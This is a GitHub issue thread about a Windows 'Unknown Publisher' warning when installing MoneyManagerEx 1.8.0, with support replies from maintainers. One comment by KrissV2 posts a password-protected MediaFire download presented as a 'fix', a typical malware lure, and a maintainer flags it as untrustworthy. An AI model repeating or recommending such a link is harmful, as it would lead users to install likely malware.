### ISSUE TITLE
Error - Unknown Publisher

### ISSUE THREAD

**Issue by bramalingam81** [moneymanagerex/moneymanagerex#6850]
[MoneyManager-UnknownPublisher.docx](https://github.com/user-attachments/files/16823679/MoneyManager-UnknownPublisher.docx)
MMEX version:
 - [ ] 1.7.0
 - [X] 1.8.0
 - [ ] 1.8.1
 - [ ] 1.8.2
 - [ ] Other (please specify)

Note: bug reporters are expected to have verified the bug still exists
either in the last stable version of MMEX or on updated development code
(master branch).

Operating System:
 - [x] Windows
 - [ ] Mac OSX
 - [ ] Linux 

# Description of the bug

Please describe your issue with details.
Add screenshot or other files if needed.

# Reproduction

Is the bug reproducible? 
 - [x] Always 
 - [ ] Randomly 
 - [ ] Happened only once

Reproduction steps:

Expected result:

Actual result:

# Additional information

If you have a backtrace for a crash or a warning, paste it here.

**Comment by renato-mmex** [comment]
Where did you download MMEX.EXE.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by bramalingam81** [comment]
> Where did you download MMEX.EXE.

https://moneymanagerex.org/

**Comment by renato-mmex** [comment]
@bramalingam81 Attention: In my opinion, the link from KrissV2 is not trustworthy and is said to originate from Russia.

**Comment by renato-mmex** [comment]
@bramalingam81 Which version of Windows are you using? Have you made all Windows updates?

**Comment by bramalingam81** [comment]
> @bramalingam81 Attention: In my opinion, the link from KrissV2 is not trustworthy and is said to originate from Russia.

Thanks for this, I recognized it.

**Comment by bramalingam81** [comment]
> @bramalingam81 Which version of Windows are you using? Have you made all Windows updates?

Windows 11, yes I have all updates. I do have windows defender enabled.

**Comment by bramalingam81** [comment]
@renato-mmex  Can you please check this query as well ?  https://github.com/moneymanagerex/moneymanagerex/discussions/6851

**Comment by renato-mmex** [comment]
I have downloaded the latest version of MMEX, depending on the Windows 11 version I get different messages. Microsoft Defender reacts more and more aggressively to files that are not downloaded from the Microsoft Store. The software downloaded from https://moneymanagerex.org/ can be installed without hesitation. Under the properties of the file mmex-1.8.0-win64.exe you can activate ‘Allow’.

**Comment by bramalingam81** [comment]
> I have downloaded the latest version of MMEX, depending on the Windows 11 version I get different messages. Microsoft Defender reacts more and more aggressively to files that are not downloaded from the Microsoft Store. The software downloaded from https://moneymanagerex.org/ can be installed without hesitation. Under the properties of the file mmex-1.8.0-win64.exe you can activate ‘Allow’.

Thank you so much for validating it. I will install it now.

**Comment by whalley** [comment]
https://github.com/moneymanagerex/moneymanagerex/issues/2355
https://github.com/moneymanagerex/moneymanagerex/issues/6700

**Comment by bramalingam81** [comment]
> #2355 #6700

Thank you so much.
